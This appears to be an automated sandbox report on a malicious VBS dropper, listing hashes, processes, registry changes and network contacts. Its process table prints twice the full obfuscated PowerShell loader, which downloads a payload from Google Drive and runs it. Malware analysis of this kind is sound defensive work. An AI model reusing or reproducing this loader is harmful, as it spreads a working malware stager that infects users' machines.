| File name: | 26b82fd5a4ab4248f5a29df2d5b66b8bb09f92b5fdc74321524907a97964eea3.vbs |
| Full analysis: | https://app.any.run/tasks/38121130-3741-435f-94aa-a95307a8ac29 |
| Verdict: | Malicious activity |
| Analysis date: | March 05, 2024, 13:33:38 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | FAADCAFCBA5638E2085AEF8D41116AA6 |
| SHA1: | AB5EF9D2CD821CE7E26E882F526FBEABCC3C3854 |
| SHA256: | 26B82FD5A4AB4248F5A29DF2D5B66B8BB09F92B5FDC74321524907A97964EEA3 |
| SSDEEP: | 384:sPYAX6N2qI8x8vv+IdIoJTSGlLUXZZ6nYec:OYA6gqIcQ3drgGlYpknC |
| PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2912 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skiddoos=46137+39879;$Cammed108 = 'set /A 1^^0';$Haars204 = (cmd /c $Cammed108);Function Accendible ($Abashed){$Coking = 8;$Unilingual=$Abashed.Length-1;For($Tekstmnstrets=7; $Tekstmnstrets -lt $Unilingual; $Tekstmnstrets+=$Coking){$Wrimple=$Wrimple+$Abashed.Substring($Tekstmnstrets, $Haars204)};$Wrimple;}function Scabridity ($Statusers){. ($Wrimple01) ($Statusers);}$Wrimple02=Accendible 'Lastsp.TB.lerner PredecaDrontennLand.rusSubvitrfP.liomyeDeterg,r NybyggrDeterioiOverplanmedgrligDraperi ';$Afstivningstmmers=Accendible 'Lodest.hUndervitAnkomsttInformapCoinsurs Soleno: Nonemb/ Causa,/Becha.edComposir laneriUklarhevOpfindsewormsee.Defoamog oncopiounmanagoSkalmurgUnderprlFringeneDrogent. Civ.licOsma fioPladerdmProvacc/Us,adelu Evi,cecindlaan?HauncheeOpsplitxAnsttelpCuriaraoCentrumrDesorietVapouri=CephaladVitalisoHirenphwDoomfulnhovmodel AmyralounderstaAm.ralidUdstehi&AmbulatiQuinquadUheldss=kistebu1argumen8Caccago5RadiogrM Me,vir9UdgangsE SuppleCTeenage4Prepend1UltraugdBere.niwKlemati5Aksi maI HamperCTythenoj Flonel2evidensrWeibyeiAStrejkewAttestaBUns,ipwWbrowsicN Automa7 Proteil Coni.icCo serv0nonoxidOSekundapDisp.rg0 onhydr1 Tachar5Vandlb x Rusti iHa burg ';$Wrimple01=Accendible ' Vitelli Udvi teUnders,x Center ';$Wrimple00=Accendible 'Insolat$BolendegTrapezelGeopol,o gep dab.luglikaDefrayalOutgene: Opbl nPAntiteshBy.tateyTrassentSkintilokvaliteg Demog.rDemarkaaUndisteph pocrahStockkeiKruseducBristniaArrasenlLeotard8Seksual Aphot t=Comm.ns VladimiSAnkylomt catophaPjattesrKollek t Bestrb-TyndsliBSrbes aiTeknolotForhaansStatio Tdrikr,drSpej.gsaIn,eksenAsperatsSyntaksfInframaeOr cularForha,d Artsarm-RamoselSTil,ehroExtractuklaringrCo,terbcCumha.ieIrradia Autoens$ StumpnAFornj.lfCivilissStudstpt Stningibellbotv pediadnMang,doiNicotinnIblandegMicrodis.kinneltTrf.erumInfernamExpermeecoessenrVentrilsSynephr Lystbet-KdehandDSemiflue Trashys .ortsyt Disputiso.tenenViolaquaSvagestt 
FederaiDionaeaobukserencerebra Rvesk $drikkeaPTaipisuh u egoiyD.nkiost Ud.redo SchoolgNoncommrJunoes.a .llegap orevishIntuitii TematicPosteroasilicasldaftber2p dsend ';Scabridity (Accendible 'S.aldic$Digt rvgCeratiilgregariooverfaubDepraveaDevierilMillion:SinglesPGithasvhInspi,eySnudesttprocessoVi lategAngou.erCount,ra bettonp Ov.rsthDagsb fiMedianscFldeskuaSturochl Paleoe2Morfins=imbrang$AnchieteOctart,nBl,ckshvCardiot:PoormasaKoncernp,pkastep scattedBengeleaTrueblut Epis maVulned, ') ;Scabridity (Accendible 'AlternaIWawahpamC tenatpBldningo .enhusr aloyert,lectro-Vi,tresMPaliuruo BoligsdUntangeuYo.thhelUmoral.eHejsevr SalvadoB InjuriitopnotetS rangcsBffelldTbaldriar FortjnaTaareganPrograms EftermfWulderse hjs etrWr,teup ') ;$Phytographical2=$Phytographical2+'\Gldseftergivelses.Fel' ;Scabridity (Accendible ' Swe,ge$Fe,eratgdimou.sl ,ouchmo .ideribYourselaMirakgllSkattel:InterstPEjerforh Kont ry Genfort RegimeoOptimerg Nedjusru,ringea Delefipoverbulh,rankisinonemancAreologaFjeligelTarokko7Afregni=Colorab(EunuchiTA.lgsbee VestensBlomstetTrrelof-PatonceP Octalsash,mmiet inguahScotist Underli$BadekaaPTunkaemhRente,nyAbletnetPaafyldobaudsprgmaalek.rUnfruita ChromipPatinathPrancomi.arbonacLa,gfriaU derkul Trickl2S.derkn)Kvadrat ') ;while (-not $Phytographical7) {Scabridity (Accendible ' forvrnIforflytf M,krot absor,e( Misrgt$PondingPPalm.hahMorphoty Indsb t NaphthoCha.tergI dkaldrLynhurtakvatorip lvisshhBanallyiFrstehacRemodulaKunstnel errass8Writing.Tailor JMeaslyuoOblikkebFoothotSIrr,laptWaflibuaFollicutTorskede Septi, Strivi -Flou isebellwavqBetatro Sidelin$ImponerWPresaubrSocio ei UnrimemMegaherparistomlBuslomme Be.tin0f.rsker2telesko)Unamic, Overcl{bolvrksSCapitaltBrunhedaSubcalcrvelfo,bt Thetar-.nnebirSCrass,llExtracoeDigitaleHaltefapCentera .otcher1Syntese}GlyoxalePostpe.lRecyclasIsflagee Andend{Mea.ingSStemmentRelandsa McgeemrslngtestDani,at-stjfiltSlovstril LivsvaeKaldenae assyrep,rontoe Overreg1Opsigel;Af,edtnSDawsonicUmedg laTrus 
enbConcilirTra,ficiP,ofligdNonrepriRackapetFritidsyLoachov papirp$SokolsgWudforinrKilledcistamcafmm.rkskrp,ichtjelSall.deesnurr.t0 Rumens0Spartel} Clinke ');Scabridity (Accendible 'Fs ebnd$Rade,bagSylvit.lS,avophoFortrstbMutualiaPodophylNonanim:P,rdineP FamseshDisa reydrawar tTilregnoStikprvgHurtfulrEgotripaBaandskp kmpernhmountdai Bra glcPintetoa OliskelSma fil7Radiogr=Stilret(FrailsbTInautheeUnnumersOpinicut Duevej-HderkroP No fluaProffertUnse.erhMagneti Afprv,u$AntalgoPNonpershFas sttyo,brelltParabelo,ietarigPar digrUdvisniaUncontrpHjkirkehStvkonsiFinanslcBedstema Vandbel C,amle2Fladere)Hetaeri ') ;}Scabridity (Accendible 'B evbak$Bankerdg Ordinal Uti igoMarsupibopalesca Br.ndflUnworsh:SnekkehLGenerena SandkreDisraeloRevivi tBlindetrKalasetoI,kassepPerloneoCadaveruDyr,kuestoemexc Diktato=Snowshi ChouxtGCleistoeIssac.atC.fetea-Bilk.saCpantotao QuizzanF,ingeetInspirae Haspnin M.otomt elvbet Centuma$ComplexPTotalithAfsoegnyStamment Indv no P,econgKontaktr Bjr.ena,panierp RadiathAmarilliUnilluscRubedinaFlottenlvalguse2Taksato ');Scabridity (Accendible ' Favell$Overcarg C,uciflDetickeoGo.vinsbRuggednakhariaslMeshugg:.ladelaL M.getpa Gangarm Hjemmeepopuloul Vognt,lOrisonsiUrosignrMurengeoNonepi sDominiktTiltroerGenoptra SmaabolMiscues Uphurlu=Bebrush Dishono[SygemelSRemittoyN enkebsLynchnit .tartieShagamamForlods.Cent.icCRam sjao raillenCollabovTsunam,eExemp.ir etranstI telli]Nonappe: Antibl: undepFDeene,gr PlastvoCra,iovmS.rrogaBHalvpenaSknhedesLengt eeOverdro6ribbidg4ProklamSTimelnnt Gormanr.tevieli Moderan.fesschg.enskab(His,ori$sto,enwLMentat,aBoar,ine.ddanneoNoctilutMycoticrGephyrooKop.lerpDeskri.oMilita,uS,udieasEccen,r)Acciden ');Scabridity (Accendible 'Ramadan$ParchekgRegu.erlKla sisoKageforb FjerboaTotalitlHe,eaar:MonstrsW egattrSetternilurifakm OrdmelpSalmesalElskende preden2I korpo Triquin=Stemnin Haandkr[RedosopSrundvisyP,tchrasExcursitRunl tseSkad.sfmConstr..BenchlaT Fir.ngeNonfricxLa dstttAfsgn.n.Skridf.EOutragin entiacDiffereoS ddelmd D lplai 
I.speknForndnegFaenome].ejldug:Pleuros:AfdelinAOmlsninS o isthCAcontiuIDetribaIBerappe.SublacuGFa,vetreStivetrtFlatterSswagsmetUntrendrExcelleiTartelenEgyptiagFormand(Teorish$ KunstaLBazookaaRidsedem.inickie PillorlBortfralSlentreiCog.atir MonsteoKnoldessgrimesctviscomerSat ritaEphaoptl Plau.i)Paaka.d ');Scabridity (Accendible 'Bernha,$ uinticgSpurgtelLamaiteoBe.oligbFacetssaTogternl Exquis:ProcrypWTrommesr SuburbiFoamstimOverskup.roclasl Bunk eeOrangou3Geronto= Chetkb$ Hakk,oWBrancher,refertiFoison.mErhvervp Sequeslnavifo,eYasmina2Drap,av.LunulaesFradmm.u Udgjo.bHanoidasSkehejrtEtam nerK.nziteivableskn .ndersgU,nytte(Ligning3Iscario2Twittyr1Par.iro3Vikliso8Magnetp4Bukke d,Skriged3Bommert1,andels8Subadmi2Quinque2Enteroc)Non cco ');Scabridity $Wrimple3;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3056 | "C:\WINDOWS\system32\cmd.exe" /c "set /A 1^^0" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3264 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4192 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skiddoos=46137+39879;$Cammed108 = 'set /A 1^^0';$Haars204 = (cmd /c $Cammed108);Function Accendible ($Abashed){$Coking = 8;$Unilingual=$Abashed.Length-1;For($Tekstmnstrets=7; $Tekstmnstrets -lt $Unilingual; $Tekstmnstrets+=$Coking){$Wrimple=$Wrimple+$Abashed.Substring($Tekstmnstrets, $Haars204)};$Wrimple;}function Scabridity ($Statusers){. ($Wrimple01) ($Statusers);}$Wrimple02=Accendible 'Lastsp.TB.lerner PredecaDrontennLand.rusSubvitrfP.liomyeDeterg,r NybyggrDeterioiOverplanmedgrligDraperi ';$Afstivningstmmers=Accendible 'Lodest.hUndervitAnkomsttInformapCoinsurs Soleno: Nonemb/ Causa,/Becha.edComposir laneriUklarhevOpfindsewormsee.Defoamog oncopiounmanagoSkalmurgUnderprlFringeneDrogent. Civ.licOsma fioPladerdmProvacc/Us,adelu Evi,cecindlaan?HauncheeOpsplitxAnsttelpCuriaraoCentrumrDesorietVapouri=CephaladVitalisoHirenphwDoomfulnhovmodel AmyralounderstaAm.ralidUdstehi&AmbulatiQuinquadUheldss=kistebu1argumen8Caccago5RadiogrM Me,vir9UdgangsE SuppleCTeenage4Prepend1UltraugdBere.niwKlemati5Aksi maI HamperCTythenoj Flonel2evidensrWeibyeiAStrejkewAttestaBUns,ipwWbrowsicN Automa7 Proteil Coni.icCo serv0nonoxidOSekundapDisp.rg0 onhydr1 Tachar5Vandlb x Rusti iHa burg ';$Wrimple01=Accendible ' Vitelli Udvi teUnders,x Center ';$Wrimple00=Accendible 'Insolat$BolendegTrapezelGeopol,o gep dab.luglikaDefrayalOutgene: Opbl nPAntiteshBy.tateyTrassentSkintilokvaliteg Demog.rDemarkaaUndisteph pocrahStockkeiKruseducBristniaArrasenlLeotard8Seksual Aphot t=Comm.ns VladimiSAnkylomt catophaPjattesrKollek t Bestrb-TyndsliBSrbes aiTeknolotForhaansStatio Tdrikr,drSpej.gsaIn,eksenAsperatsSyntaksfInframaeOr cularForha,d Artsarm-RamoselSTil,ehroExtractuklaringrCo,terbcCumha.ieIrradia Autoens$ StumpnAFornj.lfCivilissStudstpt Stningibellbotv pediadnMang,doiNicotinnIblandegMicrodis.kinneltTrf.erumInfernamExpermeecoessenrVentrilsSynephr Lystbet-KdehandDSemiflue Trashys .ortsyt Disputiso.tenenViolaquaSvagestt 
FederaiDionaeaobukserencerebra Rvesk $drikkeaPTaipisuh u egoiyD.nkiost Ud.redo SchoolgNoncommrJunoes.a .llegap orevishIntuitii TematicPosteroasilicasldaftber2p dsend ';Scabridity (Accendible 'S.aldic$Digt rvgCeratiilgregariooverfaubDepraveaDevierilMillion:SinglesPGithasvhInspi,eySnudesttprocessoVi lategAngou.erCount,ra bettonp Ov.rsthDagsb fiMedianscFldeskuaSturochl Paleoe2Morfins=imbrang$AnchieteOctart,nBl,ckshvCardiot:PoormasaKoncernp,pkastep scattedBengeleaTrueblut Epis maVulned, ') ;Scabridity (Accendible 'AlternaIWawahpamC tenatpBldningo .enhusr aloyert,lectro-Vi,tresMPaliuruo BoligsdUntangeuYo.thhelUmoral.eHejsevr SalvadoB InjuriitopnotetS rangcsBffelldTbaldriar FortjnaTaareganPrograms EftermfWulderse hjs etrWr,teup ') ;$Phytographical2=$Phytographical2+'\Gldseftergivelses.Fel' ;Scabridity (Accendible ' Swe,ge$Fe,eratgdimou.sl ,ouchmo .ideribYourselaMirakgllSkattel:InterstPEjerforh Kont ry Genfort RegimeoOptimerg Nedjusru,ringea Delefipoverbulh,rankisinonemancAreologaFjeligelTarokko7Afregni=Colorab(EunuchiTA.lgsbee VestensBlomstetTrrelof-PatonceP Octalsash,mmiet inguahScotist Underli$BadekaaPTunkaemhRente,nyAbletnetPaafyldobaudsprgmaalek.rUnfruita ChromipPatinathPrancomi.arbonacLa,gfriaU derkul Trickl2S.derkn)Kvadrat ') ;while (-not $Phytographical7) {Scabridity (Accendible ' forvrnIforflytf M,krot absor,e( Misrgt$PondingPPalm.hahMorphoty Indsb t NaphthoCha.tergI dkaldrLynhurtakvatorip lvisshhBanallyiFrstehacRemodulaKunstnel errass8Writing.Tailor JMeaslyuoOblikkebFoothotSIrr,laptWaflibuaFollicutTorskede Septi, Strivi -Flou isebellwavqBetatro Sidelin$ImponerWPresaubrSocio ei UnrimemMegaherparistomlBuslomme Be.tin0f.rsker2telesko)Unamic, Overcl{bolvrksSCapitaltBrunhedaSubcalcrvelfo,bt Thetar-.nnebirSCrass,llExtracoeDigitaleHaltefapCentera .otcher1Syntese}GlyoxalePostpe.lRecyclasIsflagee Andend{Mea.ingSStemmentRelandsa McgeemrslngtestDani,at-stjfiltSlovstril LivsvaeKaldenae assyrep,rontoe Overreg1Opsigel;Af,edtnSDawsonicUmedg laTrus 
enbConcilirTra,ficiP,ofligdNonrepriRackapetFritidsyLoachov papirp$SokolsgWudforinrKilledcistamcafmm.rkskrp,ichtjelSall.deesnurr.t0 Rumens0Spartel} Clinke ');Scabridity (Accendible 'Fs ebnd$Rade,bagSylvit.lS,avophoFortrstbMutualiaPodophylNonanim:P,rdineP FamseshDisa reydrawar tTilregnoStikprvgHurtfulrEgotripaBaandskp kmpernhmountdai Bra glcPintetoa OliskelSma fil7Radiogr=Stilret(FrailsbTInautheeUnnumersOpinicut Duevej-HderkroP No fluaProffertUnse.erhMagneti Afprv,u$AntalgoPNonpershFas sttyo,brelltParabelo,ietarigPar digrUdvisniaUncontrpHjkirkehStvkonsiFinanslcBedstema Vandbel C,amle2Fladere)Hetaeri ') ;}Scabridity (Accendible 'B evbak$Bankerdg Ordinal Uti igoMarsupibopalesca Br.ndflUnworsh:SnekkehLGenerena SandkreDisraeloRevivi tBlindetrKalasetoI,kassepPerloneoCadaveruDyr,kuestoemexc Diktato=Snowshi ChouxtGCleistoeIssac.atC.fetea-Bilk.saCpantotao QuizzanF,ingeetInspirae Haspnin M.otomt elvbet Centuma$ComplexPTotalithAfsoegnyStamment Indv no P,econgKontaktr Bjr.ena,panierp RadiathAmarilliUnilluscRubedinaFlottenlvalguse2Taksato ');Scabridity (Accendible ' Favell$Overcarg C,uciflDetickeoGo.vinsbRuggednakhariaslMeshugg:.ladelaL M.getpa Gangarm Hjemmeepopuloul Vognt,lOrisonsiUrosignrMurengeoNonepi sDominiktTiltroerGenoptra SmaabolMiscues Uphurlu=Bebrush Dishono[SygemelSRemittoyN enkebsLynchnit .tartieShagamamForlods.Cent.icCRam sjao raillenCollabovTsunam,eExemp.ir etranstI telli]Nonappe: Antibl: undepFDeene,gr PlastvoCra,iovmS.rrogaBHalvpenaSknhedesLengt eeOverdro6ribbidg4ProklamSTimelnnt Gormanr.tevieli Moderan.fesschg.enskab(His,ori$sto,enwLMentat,aBoar,ine.ddanneoNoctilutMycoticrGephyrooKop.lerpDeskri.oMilita,uS,udieasEccen,r)Acciden ');Scabridity (Accendible 'Ramadan$ParchekgRegu.erlKla sisoKageforb FjerboaTotalitlHe,eaar:MonstrsW egattrSetternilurifakm OrdmelpSalmesalElskende preden2I korpo Triquin=Stemnin Haandkr[RedosopSrundvisyP,tchrasExcursitRunl tseSkad.sfmConstr..BenchlaT Fir.ngeNonfricxLa dstttAfsgn.n.Skridf.EOutragin entiacDiffereoS ddelmd D lplai 
I.speknForndnegFaenome].ejldug:Pleuros:AfdelinAOmlsninS o isthCAcontiuIDetribaIBerappe.SublacuGFa,vetreStivetrtFlatterSswagsmetUntrendrExcelleiTartelenEgyptiagFormand(Teorish$ KunstaLBazookaaRidsedem.inickie PillorlBortfralSlentreiCog.atir MonsteoKnoldessgrimesctviscomerSat ritaEphaoptl Plau.i)Paaka.d ');Scabridity (Accendible 'Bernha,$ uinticgSpurgtelLamaiteoBe.oligbFacetssaTogternl Exquis:ProcrypWTrommesr SuburbiFoamstimOverskup.roclasl Bunk eeOrangou3Geronto= Chetkb$ Hakk,oWBrancher,refertiFoison.mErhvervp Sequeslnavifo,eYasmina2Drap,av.LunulaesFradmm.u Udgjo.bHanoidasSkehejrtEtam nerK.nziteivableskn .ndersgU,nytte(Ligning3Iscario2Twittyr1Par.iro3Vikliso8Magnetp4Bukke d,Skriged3Bommert1,andels8Subadmi2Quinque2Enteroc)Non cco ');Scabridity $Wrimple3;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4452 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5192 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\26b82fd5a4ab4248f5a29df2d5b66b8bb09f92b5fdc74321524907a97964eea3.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5660 | ping 6777.6777.6777.677e | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6056 | cmd.exe /c ping 6777.6777.6777.677e | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6304 | "C:\WINDOWS\system32\cmd.exe" /c "set /A 1^^0" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.746 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6520 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
| Value: | 1 | | |
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
| Value: | 1 | | |
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
| Value: | 1 | | |
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
| Value: | 0 | | |
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
| Value: | 1 | | |
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
| Value: | 1 | | |
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
| Value: | 1 | | |
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
| Value: | 0 | | |
| (PID) Process: | (2912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
| Value: | 1 | | |
| (PID) Process: | (2912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
| Value: | 1 | | |
| PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4192 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a1wv3hhd.owt.ps1 | text | |
| MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | | | |
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bzlrx34g.35c.ps1 | text | |
| MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | | | |
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rpo2tu4v.lkf.psm1 | text | |
| MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | | | |
| 4192 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_invzhw40.5jd.psm1 | text | |
| MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | | | |
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
| MD5: C76555487F3760099709FD7487BFB259 | SHA256: AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861 | | | |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 6440 | svchost.exe | GET | 200 | 2.18.79.138:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.01 Kb | unknown |
| 5928 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
| 1776 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
| 1248 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 314 b | unknown |
| 2464 | svchost.exe | GET | 200 | 23.35.209.170:80 | http://x1.c.lencr.org/ | unknown | binary | 717 b | unknown |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 6440 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 3848 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
| 4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
| 5184 | SearchApp.exe | 95.100.98.104:443 | www.bing.com | Akamai International B.V. | IE | unknown |
| 5928 | svchost.exe | 40.126.32.133:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
| 6896 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 5928 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
| 6440 | svchost.exe | 2.18.79.138:80 | crl.microsoft.com | Akamai International B.V. | AT | unknown |
| 5928 | svchost.exe | 40.126.32.74:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 1248 | backgroundTaskHost.exe | 95.100.98.104:443 | www.bing.com | Akamai International B.V. | IE | unknown |
| Domain | IP | Reputation |
|---|---|---|
| 6777.6777.6777.677e | | unknown |
| ocsp.digicert.com | | whitelisted |
| settings-win.data.microsoft.com | | whitelisted |
| crl.microsoft.com | | whitelisted |
| www.bing.com | | whitelisted |
| arc.msn.com | | whitelisted |
| drive.google.com | | shared |
| drive.usercontent.google.com | | unknown |
| slscr.update.microsoft.com | | whitelisted |
| fe3cr.delivery.mp.microsoft.com | | whitelisted |